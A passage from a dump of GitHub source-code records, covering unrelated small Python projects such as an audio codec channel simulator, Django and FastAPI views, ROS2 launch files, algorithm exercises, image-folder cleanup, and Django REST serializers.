\"SILK\" and (Fs == 8000 or Fs == 16000):\n\t\tos.system(\"codecs/opus_demo -e voip \" + str(Fs) + \" 1 \" + str(rate) + \" -cbr temp/signal_sent.raw temp/OPUS_SILK-enc.out\")\n\t\tos.system(\"codecs/opus_demo -d \" + str(Fs) + \" 1 temp/OPUS_SILK-enc.out temp/signal_received.raw\")\n\t\tsignal_rec = np.fromfile(\"temp/signal_received.raw\", dtype = 'int16')\n\t\tif Fs == 8000:\n\t\t\tsignal_rec = signal_rec[53:]\n\t\telse:\n\t\t\tsignal_rec = signal_rec[104:]\n\telif codec == \"CELT\" and (Fs == 8000 or Fs == 16000):\n\t\tos.system(\"codecs/opus_demo -e audio \" + str(Fs) + \" 1 \" + str(rate) + \" -cbr temp/signal_sent.raw temp/OPUS_CELT-enc.out\")\n\t\tos.system(\"codecs/opus_demo -d \" + str(Fs) + \" 1 temp/OPUS_CELT-enc.out temp/signal_received.raw\")\n\t\tsignal_rec = np.fromfile(\"temp/signal_received.raw\", dtype = 'int16')\n\t\tif Fs == 8000:\n\t\t\tsignal_rec = signal_rec[53:]\n\t\telse:\n\t\t\tsignal_rec = signal_rec[104:]\n\telse:\n\t\tprint(\"Bad channel parameters\")\n\t\tsignal_rec = [1]\n\t\n\treturn signal_rec.astype('float')\n","repo_name":"PiotrKrasnowski/Speech_Encryption","sub_path":"channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":1721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"18535385708","text":"from itertools import combinations\nfrom tqdm import tqdm\nimport pandas as pd\nimport numpy as np\nimport pprint\n\n\ndef classify_sentiment(n_del, p_del, sent_score):\n \"\"\"Function that classifies a sentiment score into one of three categories: 0 (negative), 1 (neutral),\n 2 (positive) \"\"\"\n if sent_score < n_del:\n return 0\n elif sent_score > p_del:\n return 2\n else:\n return 1\n\n\ndef get_error(data, column):\n improvements_err = (data[\"improvements_sentiment\"] != data[column])\n return improvements_err.sum() / df.shape[0]\n\n\ndef get_best_delimiters(data, lang, app):\n column = f\"improvements_{lang}_{app}\"\n # All possible combinations for delimiters\n digits = np.arange(data[f\"{column}_gscore\"].min(), data[f\"{column}_gscore\"].max(), .01)\n delimiters = list(combinations(digits, 2))\n\n max_val = 0\n best_delimiter = delimiters[0]\n\n for delimiter in tqdm(delimiters):\n data[f\"{column}_sentiment\"] = data[f\"{column}_gscore\"].apply(lambda x: classify_sentiment(*delimiter, x))\n error = get_error(data, f\"{column}_sentiment\")\n if error > max_val:\n max_val = error\n best_delimiter = delimiter\n return best_delimiter, max_val\n\n\nif __name__ == \"__main__\":\n df = pd.read_csv(\"datasets/dataset_oficial.csv\", usecols=[\"Sentimiento 2\"])\n df.columns = [\"improvements_sentiment\"]\n\n for app in [\"complete\", \"noun_adj\", \"adj\"]:\n for lang in [\"es\", \"en\"]:\n x_df = pd.read_csv(f\"datasets/gcloud_output_{lang}_{app}_val.csv\")\n x_df[f\"improvements_{lang}_{app}_gscore\"] = x_df[f\"improvements_{lang}_{app}_gscore\"] * \\\n (x_df[f\"improvements_{lang}_{app}_gmagnitude\"] + 1)\n y_df = pd.read_csv(f\"datasets/gcloud_output_{lang}_{app}_prod.csv\")\n y_df[f\"improvements_{lang}_{app}_gscore\"] = y_df[f\"improvements_{lang}_{app}_gscore\"] * \\\n (y_df[f\"improvements_{lang}_{app}_gmagnitude\"] + 1)\n z_df = pd.concat([x_df, y_df])\n z_df = z_df.set_index(\"index\")\n\n df = df.merge(z_df[f\"improvements_{lang}_{app}_gscore\"], left_index=True, right_index=True)\n df.to_csv(\"datasets/complete_gscores.csv\")\n\n results = dict()\n for app in [\"complete\", \"noun_adj\", \"adj\"]:\n for lang in [\"es\", \"en\"]:\n best_threshold, max_acc = get_best_delimiters(df, lang, app)\n results[f\"improvements_{lang}_{app}\"] = {}\n results[f\"improvements_{lang}_{app}\"][\"best_threshold\"] = best_threshold\n results[f\"improvements_{lang}_{app}\"][\"max_accuracy\"] = max_acc\n\n app = \"complete\"\n lang = \"en\"\n #column = f\"improvements_{lang}_{app}\"\n #df[f\"{column}_sentiment\"] = df[f\"{column}_gscore\"].apply(lambda x: classify_sentiment(-0.05266, 0.979148, x))\n #error = get_error(df, f\"{column}_sentiment\")\n\n pp = pprint.PrettyPrinter(indent=4)\n pp.pprint(results)","repo_name":"omar-bracamontes-zavala/Sermone","sub_path":"data_merge.py","file_name":"data_merge.py","file_ext":"py","file_size_in_byte":2984,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"36073577636","text":"# LKS1Mb-Sender-2.py\r\n# Besked fra input sendt kontinuerligt (løbende) med \r\n# på default kanal med default sendestyrke med 500msec interval\r\nfrom microbit import *\r\nimport radio\r\n\r\nradio.on()\r\nbesked = input(\"Indtast det som skal sendes: \") # Venter på input fra shell\r\n \r\nwhile True:\r\n radio.send(besked)\r\n sleep(500) # Er vigtig nu da program IKKE venter på input hver gang det kommer rundt\r\n # Bemærk forskel i modtager ift. sender-1.","repo_name":"TPSoundhub/LYDKit2022","sub_path":"SPOR 1/LKS1/Mb/LKS1Mb-Sender-2.py","file_name":"LKS1Mb-Sender-2.py","file_ext":"py","file_size_in_byte":486,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"9432853421","text":"from django.shortcuts import render, redirect\nfrom .models import Notice\n\n\n# Read : 전체 게시글 조회\ndef index(request):\n notices = Notice.objects.all()[::-1]\n context = {\n 'notices' : notices\n }\n return render(request, 'notices/index.html', context) # 전체 게시글 목록을 반환\n\n# Create : 게시글 생성\ndef new(request):\n return render(request, 'notices/new.html')\n\ndef create(request):\n title = request.POST.get('title')\n content = request.POST.get('content')\n notice = Notice(title=title, content=content) # 입력받은 값을 Notice에 저장\n notice.save() # DB에 저장\n \n # 새 url로 요청 전송\n return redirect('notices:detail', notice.pk)\n\n# Read : 개별 게시글 조회\ndef detail(request, pk):\n notice = Notice.objects.get(pk=pk)\n context = {\n 'notice' : notice,\n }\n \n return render(request, 'notices/detail.html', context)\n\n# Delete : 게시글 삭제\ndef delete(request, pk):\n notice = Notice.objects.get(pk=pk)\n # POST일 경우에만 삭제 : 보안 문제\n if request.method == 'POST':\n notice.delete()\n return redirect('notices:index')\n # POST가 아닐 경우, 삭제 버튼이 있는 detail 페이지로 redirect\n else:\n return redirect('notices:detail', notice.pk)\n\n# Update : 게시글 수정\ndef edit(request, pk):\n notice = Notice.objects.get(pk=pk)\n context = {\n 'notice' : notice,\n }\n return render(request, 'notices/edit.html', context)\n\ndef update(request, pk):\n notice = Notice.objects.get(pk=pk)\n notice.title = request.POST.get('title')\n notice.content = request.POST.get('content')\n notice.save()\n return redirect('notices:detail', notice.pk)","repo_name":"lhynjn9/Django_CRUD","sub_path":"01_Basic_CRUD/notices/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"10372634507","text":"\"\"\"\nTest command line program dials.two_theta_refine by running a job with saved\ndata and comparing with expected output.\n\"\"\"\n\nfrom __future__ import absolute_import, division, print_function\n\nimport procrunner\nimport pytest\n\nfrom dxtbx.model.experiment_list import ExperimentListFactory\n\n\ndef test(dials_data, tmpdir):\n \"\"\"Test two theta refine on integrated data.\"\"\"\n # use multiple scan small molecule data for this test\n data_dir = dials_data(\"l_cysteine_dials_output\")\n prefix = (20, 25, 30, 35)\n exp_path = [data_dir / (\"%d_integrated_experiments.json\" % p) for p in prefix]\n pkl_path = [data_dir / (\"%d_integrated.pickle\" % p) for p in prefix]\n\n for pth in exp_path + pkl_path:\n assert pth.check(), \"%s missing\" % pth.strpath\n\n cmd = (\n [\n \"dials.two_theta_refine\",\n \"cif=refined_cell.cif\",\n \"output.correlation_plot.filename=corrplot.png\",\n ]\n + exp_path\n + pkl_path\n )\n\n print(cmd)\n\n # work in a temporary directory\n result = procrunner.run(cmd, working_directory=tmpdir)\n assert not result.returncode and not result.stderr\n assert tmpdir.join(\"refined_cell.expt\").check()\n ref_exp = ExperimentListFactory.from_json_file(\n tmpdir.join(\"refined_cell.expt\").strpath, check_format=False\n )\n\n xls = ref_exp.crystals()\n assert len(xls) == 4\n for xl in xls:\n assert xl.get_unit_cell() != xl.get_recalculated_unit_cell()\n # test refined crystal model against expected values\n assert xl.get_recalculated_unit_cell().parameters() == pytest.approx(\n (5.428022880, 8.144145476, 12.039666971, 90.0, 90.0, 90.0), 1e-4\n )\n assert xl.get_recalculated_cell_parameter_sd() == pytest.approx(\n (9.58081e-5, 0.000149909, 0.000215765, 0, 0, 0), 1e-4\n )\n assert xl.get_recalculated_cell_volume_sd() == pytest.approx(0.0116254298, 1e-4)\n\n\ndef test_two_theta_refine_scaled_data(dials_data, tmpdir):\n \"\"\"Test two theta refine on scaled data.\"\"\"\n location = dials_data(\"l_cysteine_4_sweeps_scaled\")\n refls = location.join(\"scaled_20_25.refl\")\n expts = location.join(\"scaled_20_25.expt\")\n\n command = [\n \"dials.two_theta_refine\",\n refls,\n expts,\n \"output.experiments=refined_cell.expt\",\n \"partiality_threshold=0.99\",\n ]\n result = procrunner.run(command, working_directory=tmpdir)\n assert not result.returncode and not result.stderr\n assert tmpdir.join(\"refined_cell.expt\").check()\n\n ref_exp = ExperimentListFactory.from_json_file(\n tmpdir.join(\"refined_cell.expt\").strpath, check_format=False\n )\n\n assert len(ref_exp.crystals()) == 2\n for xl in ref_exp.crystals():\n # test refined crystal model against expected values\n assert xl.get_recalculated_unit_cell().parameters() == pytest.approx(\n (5.426921, 8.146654, 12.037366, 90.0, 90.0, 90.0), 1e-4\n )\n assert xl.get_recalculated_cell_parameter_sd() == pytest.approx(\n (2.0123e-04, 2.8039e-04, 4.5284e-04, 0, 0, 0), 1e-4\n )\n assert xl.get_recalculated_cell_volume_sd() == pytest.approx(0.0237364, 1e-4)\n","repo_name":"TiankunZhou/dials","sub_path":"test/command_line/test_two_theta_refine.py","file_name":"test_two_theta_refine.py","file_ext":"py","file_size_in_byte":3180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"94"} +{"seq_id":"4971310826","text":"# This is a fan-out example of: 1 SOURCE --> 3 WORK --> 3 SINK nodes.\nfrom launch import LaunchDescription\nfrom launch_ros.actions import Node\nimport os\n\n# Set test values here (will need to get cmdLine values or somesuch)\ntest_duration = '60' # duration of test run, in seconds\npub_frequency = '10' # pubs per second from SOURCE node (float32 value)\nrel_type = 'REL' # reliability type (BE=best effort, anything else is reliable.)\nmy_node = 0 # starting node ID\ndata_type_suffix = '1kb' # edit this to change data size in test\nexe_source = 'ipcsource_' + data_type_suffix\nexe_work = 'ipcwork_' + data_type_suffix\nexe_sink = 'ipcsink_' + data_type_suffix\nrmw_type = os.environ.get('RMW_IMPLEMENTATION') # RMW type used for test (for SINK node results)\n\ndef generate_launch_description():\n return LaunchDescription([\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_sink,\n output='screen',\n # SINK args: testDur, REL, pubFreq, totalNodes, fromTopic, rmwType, myCfgName\n arguments=[test_duration, rel_type, pub_frequency, '3', 'pt_profile_topic_1_2', rmw_type, 'h-3p-t1'],\n name='sink1',\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_sink,\n output='screen',\n # SINK args: testDur, REL, pubFreq, totalNodes, fromTopic, rmwType, myCfgName\n arguments=[test_duration, rel_type, pub_frequency, '3', 'pt_profile_topic_1_3', rmw_type, 'h-3p-t2'],\n name='sink2',\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_sink,\n output='screen',\n # SINK args: testDur, REL, pubFreq, totalNodes, fromTopic, rmwType, myCfgName\n arguments=[test_duration, rel_type, pub_frequency, '3', 'pt_profile_topic_1_4', rmw_type, 'h-3p-t3'],\n name='sink3',\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_work,\n output='screen',\n # WORK args: testDur, REL, myNodeId, fromTopic, toTopic\n arguments=[test_duration, rel_type, '3', 'pt_profile_topic_0_1', 'pt_profile_topic_1_4'],\n name='proc3'\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_work,\n output='screen',\n # WORK args: testDur, REL, myNodeId, fromTopic, toTopic\n arguments=[test_duration, rel_type, '2', 'pt_profile_topic_0_1', 'pt_profile_topic_1_3'],\n name='proc2'\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_work,\n output='screen',\n # WORK args: testDur, REL, myNodeId, fromTopic, toTopic\n arguments=[test_duration, rel_type, '1', 'pt_profile_topic_0_1', 'pt_profile_topic_1_2'],\n name='proc1'\n ),\n Node(\n package='mp_latency',\n namespace='ipc_lat',\n executable=exe_source,\n output='screen',\n # SOURCE args: testDur, REL, pubFreq, myNodeId, toTopic\n arguments=[test_duration, rel_type, pub_frequency, '0', 'pt_profile_topic_0_1'],\n name='source'\n )\n ])\n","repo_name":"neil-rti/ros2_mp_latency","sub_path":"mp_latency/launch/mplat_par_3t3.py","file_name":"mplat_par_3t3.py","file_ext":"py","file_size_in_byte":3396,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"94"} +{"seq_id":"40786933849","text":"# coding=utf-8\n\"\"\"\nGiven two strings str1 and str2 and below operations that can performed on str1.\nFind minimum number of edits (operations) required to convert ‘str1’ into ‘str2’\n\n* Insert\n* Remove\n* Replace\n\nAll of the above operations are of equal cost.\n\nInput: str1 = \"geek\", str2 = \"gesek\"\nOutput: 1\nWe can convert str1 into str2 by inserting a 's'.\n\nInput: str1 = \"cat\", str2 = \"cut\"\nOutput: 1\nWe can convert str1 into str2 by replacing 'a' with 'u'.\n\nInput: str1 = \"sunday\", str2 = \"saturday\"\nOutput: 3\nLast three and first characters are same. We basically\nneed to convert \"un\" to \"atur\". This can be done using\nbelow three operations.\nReplace 'n' with 'r', insert t, insert a\n\"\"\"\n\nimport unittest\n\n\ndef min_of_three(first, second, third):\n \"\"\" Calculates a min of three. parameters should be comparable \"\"\"\n return min(min(first, second), third)\n\n\ndef edit_distance_rec(str1, str2, len1, len2):\n \"\"\"\n Edit Distance Implementation naive approach using recursion\n :param str1: first string\n :param str2: second string\n :param len1: length of str1\n :param len2: length of str2\n :return: number of operations to be perform in order to transform str1 into str2\n :rtype: int\n \"\"\"\n\n if not len1:\n return len2\n\n if not len2:\n return len1\n\n if str1[len1-1] == str2[len2-1]:\n return edit_distance_rec(str1, str2, len1-1, len2-1)\n\n return 1 + min_of_three(\n edit_distance_rec(str1, str2, len1-1, len2), # delete from first\n edit_distance_rec(str1, str2, len1, len2-1), # insert into first\n edit_distance_rec(str1, str2, len1-1, len2-1) # replace char in first\n )\n\n\ndef edit_distance_dp(str1, str2):\n \"\"\"\n Edit Distance Implementation dynamic programming approach\n :param str1: first string\n :param str2: second string\n :return: number of operations to be perform in order to transform str1 into str2\n :rtype: int\n \"\"\"\n matrix = [[0 for _ in range(len(str1) + 1)] for _ in range(len(str2) + 1)]\n for i in range(len(str1)+1):\n matrix[0][i] = i\n for i in range(len(str2)+1):\n matrix[i][0] = i\n\n for column in range(1, len(str1)+1):\n for row in range(1, len(str2)+1):\n if str1[column-1] == str2[row-1]:\n curry = 0\n else:\n curry = 1\n matrix[row][column] = curry + min_of_three(\n matrix[row - 1][column],\n matrix[row][column - 1],\n matrix[row - 1][column - 1]\n )\n return matrix[len(str2)][len(str1)]\n\n\nclass TestEditDistance(unittest.TestCase):\n \"\"\" Test cases for Edit Distance \"\"\"\n\n def test_edit_distance_rec(self):\n \"\"\" Test Edit Distance Recursive \"\"\"\n print('==== Test Edit Distance Recursive ====')\n str1 = 'sunday'\n str2 = 'saturday'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 3)\n\n str1 = ''\n str2 = 'test'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 4)\n\n str1 = 'geek'\n str2 = 'gesek'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 1)\n\n str1 = 'cat'\n str2 = 'cut'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 1)\n\n def test_edit_distance_dp(self):\n \"\"\" Test Edit Distance DP \"\"\"\n print('==== Test Edit Distance DP ====')\n str1 = 'sunday'\n str2 = 'saturday'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 3)\n\n str1 = ''\n str2 = 'test'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 4)\n\n str1 = 'geek'\n str2 = 'gesek'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 1)\n\n str1 = 'cat'\n str2 = 'cut'\n print('Given strs: {} and {}'.format(str1, str2))\n result = edit_distance_rec(str1, str2, len(str1), len(str2))\n print('Need to perform {} operations', result)\n self.assertEqual(result, 1)\n","repo_name":"UseTheApi/algorithms","sub_path":"python/dynamic_programming/edit_distance/edit_distance.py","file_name":"edit_distance.py","file_ext":"py","file_size_in_byte":5036,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"94"} +{"seq_id":"40514108670","text":"from typing import Optional\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def reverseList(self, head: Optional[ListNode]) -> Optional[ListNode]:\n prev = None # 반환할 list\n curr = head # 가지고 돌 curr\n\n while curr:\n next = curr.next # 다음을 변수에 저장\n curr.next = prev # 현재 다음을 prev로 저장한다 즉, prev를 하나씩 뒤로 밀면서 앞에 추가하는 것\n prev = curr # prev는 현재로 노드로 넣어놓는다\n curr = next # 리스트 순회\n return prev","repo_name":"oio337a/Algorithm-study-Leetcode","sub_path":"parksooo/level1/day10/206.py","file_name":"206.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"36499264889","text":"from app.delivery.shop.deps import shop_paging_params\nfrom app.dto.api.shop import ShopListPagingParams, ShopListRespDTO, ShopRespDTO\nfrom app.services.shop import ShopsService\nfrom fastapi import APIRouter, Depends\n\nrouter = APIRouter(\n prefix=\"/shops\",\n tags=[\"shop\"],\n)\n\n\n@router.get(\"/{shop_id}\", response_model=ShopRespDTO)\nasync def get_shop(\n shop_id: int, shop_service: ShopsService = Depends()\n) -> ShopRespDTO:\n return await shop_service.get(shop_id)\n\n\n@router.get(\"\", response_model=ShopListRespDTO)\nasync def get_list(\n shop_service: ShopsService = Depends(),\n paging_params: ShopListPagingParams = Depends(shop_paging_params),\n) -> ShopListRespDTO:\n return await shop_service.get_list(paging_params)\n","repo_name":"ivaaahn/retailer","sub_path":"retailer/app/delivery/shop/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"29846889372","text":"import sys\nimport collections\nsys.stdin = open('BOJ_2536.txt', 'r')\n\ndef BFS():\n for i in range(1, k+1):\n if bus[i][0] <= sx <= bus[i][2] and bus[i][1] <= sy <= bus[i][3]:\n q.append(i)\n visited[i] = 1\n\n while q:\n idx = q.popleft()\n if bus[idx][0] <= dx <= bus[idx][2] and bus[idx][1] <= dy <= bus[idx][3]:\n return visited[idx]\n for j in range(1, k+1):\n if not visited[j]:\n if bus[idx][0] <= bus[j][2] and bus[idx][2] >= bus[j][0] and bus[idx][1] <= bus[j][3] and bus[idx][3] >= bus[j][1]:\n visited[j] = visited[idx] + 1\n q.append(j)\n\nm, n = map(int, input().split())\nk = int(input())\nbus = [0] * (k+1)\nfor i in range(k):\n b, x1, y1, x2, y2 = map(int, input().split())\n if x1 > x2:\n x1, x2 = x2, x1\n if y1 > y2:\n y1, y2 = y2, y1\n bus[b] = [x1, y1, x2, y2]\nsx, sy, dx, dy = map(int, input().split())\nvisited = [0] * (k+1)\nq = collections.deque()\n\nprint(BFS())","repo_name":"Sanghyeok-Jeon/Algorithm","sub_path":"Python/BAEKJOON/BOJ_2536_버스갈아타기.py","file_name":"BOJ_2536_버스갈아타기.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"35339759169","text":"import sys\ninput = lambda: sys.stdin.readline().rstrip()\nii = lambda: int(input())\nmi = lambda: map(int, input().split())\nli = lambda: list(mi())\ninf = 2 ** 63 - 1\nmod = 998244353\ndpos4 = ((1, 0), (0, 1), (-1, 0), (0, -1))\ndpos8 = ((0, -1), (1, -1), (1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0), (-1, -1))\ndef main():\n N,S = mi()\n A = li()\n dp = [False] * (S+1)\n dp[0] = True\n\n for i in range(N):\n for s in range(S,-1,-1):\n if s - A[i] >= 0:\n dp[s] = dp[s-A[i]] | dp[s] \n\n if dp[S]:\n print('Yes')\n else:\n print('No')\n \n\nif __name__ == '__main__':\n main()","repo_name":"youarenes4649/Atcoder_Python","sub_path":"2023/11th/day_17/tessokuA18.py","file_name":"tessokuA18.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"27303346557","text":"# From Nina\n\nimport sys, os\nimport shutil\nfrom os import listdir\nfrom PIL import Image\n\n\n\n# remove empty files\n\npath = \"./img/\"\n\nc = 0\n\nfiles = os.listdir(path)\n\nfor f in files:\n\tif os.stat(path+f).st_size == 0:\n\t\tos.remove(path+f)\n\t\tc = c + 1\n#\t\tshutil.move(path+f,\"./empty/\"+f) \n\t\tprint(f)\n\t\t\nprint(c)\t\t\n\n\t\t\n\t\t\n\n\n# remove corrupted files\n\nc = 0\n\nfor filename in listdir('./img/'):\n\tif filename.endswith('.jpg'):\n\t\ttry:\n\t\t\timg = Image.open('./img/'+filename) # open the image file\n\t\t\timg.verify() # verify that it is, in fact an image\n\t\texcept (IOError, SyntaxError) as e:\n\t\t\tprint('Bad file:', filename) # print out the names of corrupt files\t\n\t\t\tos.remove('./img/'+filename)\t\n\t\t\tc = c+1\n\t\t\t\nprint(c)\t\t\t\n\n\n\n# remove files that TF cannot read\n\nimport tensorflow as tf\nfrom tensorflow import keras\n\npath = \"./img/\"\n\nfiles = os.listdir(path)\n\nc = 0\n\nfor f in files:\n\tif f.endswith(\".jpg\"):\n\t\tprint(\"fffffffff\",f)\n#\t\timage1 = tf.io.decode_image(path+f)\n\t\t\n\t\ttry:\n\t\t\timage = tf.keras.preprocessing.image.load_img(path+f)\n\t\t\tinput_arr = keras.preprocessing.image.img_to_array(image)\n\t\texcept:\n\t\t\tos.remove(path+f)\t\t\t\n\t\t\tc = c+1\n\t\t\t\nprint(c)\t\t\t\n","repo_name":"sbrl/research-smflooding","sub_path":"src/lib/data/check_image.py","file_name":"check_image.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"94"} +{"seq_id":"12148639711","text":"import pytest\nfrom ..src import steganos_encode\n\n@pytest.mark.parametrize('length, expected', [\n (3, 'abc'),\n (5, 'abcab'),\n (2, 'ab')\n])\ndef test_repeated_string(length, expected):\n assert expected == steganos_encode.repeat('abc', length)\n\n@pytest.mark.parametrize('length, expected', [\n (3, ['a', 'b', 'c']),\n (5, ['a', 'b', 'c', 'a', 'b']),\n (2, ['a', 'b'])\n])\ndef test_repeated_list(length, expected):\n assert expected == steganos_encode.repeat(['a', 'b', 'c'], length)\n\ndef test_filter_by_bits():\n # given\n bits = '101'\n xs = ['a', 'b', 'c']\n\n # when\n result = steganos_encode.filter_by_bits(xs, bits)\n\n # then\n assert result == ['a', 'c']\n\ndef test_make_change_for_single_change():\n # given\n text = 'This is his dog.'\n changes = [(9, 11, 'er')]\n\n # when\n result = steganos_encode.make_changes(text, changes)\n\n # then\n assert result == 'This is her dog.'\n\ndef test_make_changes_for_two_changes():\n # given\n text = 'This is his dog.'\n changes = [(9, 11, 'er'), (12, 15, 'cat')]\n\n # when\n result = steganos_encode.make_changes(text, changes)\n\n # then\n assert result == 'This is her cat.'\n\ndef test_make_changes_when_change_is_different_length():\n # given\n text = 'This is just a sample string.'\n changes = [(22, 28, 'text'), (0, 4, 'It')]\n\n # when\n result = steganos_encode.make_changes(text, changes)\n\n # then\n assert result == 'It is just a sample text.'\n\ndef test_execute_branchpoints_when_one_is_sandwiched():\n # given\n text = '\"How is she?\" he asked.'\n branchpoints = [\n [(0, 1, \"'\"), (12, 13, \"'\")],\n [(8, 9, '')]\n ]\n\n # when\n result = steganos_encode.execute_branchpoints(branchpoints, text)\n\n # then\n assert result == \"'How is he?' he asked.\"\n\n","repo_name":"fastforwardlabs/steganos","sub_path":"steganos/test/steganos_encode_test.py","file_name":"steganos_encode_test.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","stars":81,"dataset":"github-code","pt":"94"} +{"seq_id":"41148771179","text":"from rest_framework import serializers\nfrom .models import Product, Genere, Review, CastMember, SavedMovies, Review, Notification\nfrom users.models import User\n\n\n\nclass GenereRetriveSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Genere\n fields = ['id', 'name']\n\n\n# class CustomerDetailSerializer(serializers.ModelSerializer):\n# followers_count = serializers.SerializerMethodField()\n# following_count = serializers.SerializerMethodField()\n# is_following = serializers.SerializerMethodField()\n\n# # def get_is_following(self, obj):\n# # if self.context['request'].user.is_authenticated:\n# # followers_subquery = self.context['followers_subquery_list']\n# # if obj.id in followers_subquery:\n# # return True\n# # return False\n# # return False\n\n# # def get_followers_count(self, obj):\n# # return obj.followers.count()\n\n# # def get_following_count(self, obj):\n# # return obj.following.count()\n\n# class Meta:\n# model = User\n# fields = ['username', 'first_name', 'last_name', 'designation', 'profile_pic', \n# 'followers_count', 'following_count', 'is_following']\n\n\nclass CustomerSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = User\n fields = ['username', 'first_name', 'last_name', 'designation', 'profile_pic']\n\n\nclass CastSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = CastMember\n fields = '__all__'\n\n\nclass CastRetriveSerializer(serializers.ModelSerializer):\n cast_member = CustomerSerializer()\n\n class Meta:\n model = CastMember\n fields = '__all__'\n\n\nclass ProductRetriveSerializer(serializers.ModelSerializer):\n genere = GenereRetriveSerializer(many=True)\n customer = serializers.SerializerMethodField()\n like_count = serializers.SerializerMethodField()\n dislike_count = serializers.SerializerMethodField()\n has_liked = serializers.SerializerMethodField()\n has_disliked = serializers.SerializerMethodField()\n cast = serializers.SerializerMethodField()\n owner = serializers.SerializerMethodField()\n review_count = serializers.SerializerMethodField()\n video_quality = serializers.SerializerMethodField()\n\n def get_video_quality(self, obj):\n video_url = obj.video\n splitted_list = video_url.split('/upload')\n if len(splitted_list) == 0:\n return obj.video\n else:\n video_quality_dict = {\n \"p280\": splitted_list[0] + '/upload/q_50' + splitted_list[1],\n \"p360\": splitted_list[0] + '/upload/q_40' + splitted_list[1],\n \"p720\": splitted_list[0] + '/upload/q_30' + splitted_list[1]\n }\n return video_quality_dict\n\n def get_review_count(self, obj):\n return Review.objects.filter(movie=obj.id).count()\n\n def get_cast(self, obj):\n casts = CastMember.objects.filter(product=obj.id)\n ser = CastRetriveSerializer(casts, many=True)\n return ser.data\n\n def get_customer(self, obj):\n if obj.customer.first_name==\"\" and obj.customer.last_name==\"\":\n return obj.customer.username\n return obj.customer.first_name + ' ' + obj.customer.last_name\n \n def get_like_count(self, obj):\n return obj.likes.count()\n\n def get_dislike_count(self, obj):\n return obj.dislikes.count()\n \n def get_has_liked(self, obj):\n user = self.context['request'].user\n return obj.likes.filter(pk=user.pk).exists()\n\n def get_has_disliked(self, obj):\n user = self.context['request'].user\n return obj.dislikes.filter(pk=user.pk).exists()\n \n def get_owner(self, obj):\n return obj.customer.id\n\n class Meta:\n model = Product\n fields = '__all__'\n\n\nclass ProductCreateSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = Product\n fields = '__all__'\n\n\nclass ProductDetailSerializer(serializers.ModelSerializer):\n genere = GenereRetriveSerializer(many=True)\n customer = serializers.SerializerMethodField()\n cast = CastSerializer(many=True)\n like_count = serializers.SerializerMethodField()\n dislike_count = serializers.SerializerMethodField()\n has_liked = serializers.SerializerMethodField()\n has_disliked = serializers.SerializerMethodField()\n is_own_product = serializers.SerializerMethodField()\n\n def get_customer(self, obj):\n if obj.customer.first_name==\"\" and obj.customer.last_name==\"\":\n return obj.customer.username\n return obj.customer.first_name + ' ' + obj.customer.last_name\n \n def get_like_count(self, obj):\n return obj.likes.count()\n\n def get_dislike_count(self, obj):\n return obj.dislikes.count()\n \n def get_has_liked(self, obj):\n user = self.context['request'].user\n return obj.likes.filter(pk=user.pk).exists()\n\n def get_has_disliked(self, obj):\n user = self.context['request'].user\n return obj.dislikes.filter(pk=user.pk).exists()\n \n def get_is_own_product(self, obj):\n user = self.context['request'].user\n if obj.customer == user:\n return True\n return False\n\n class 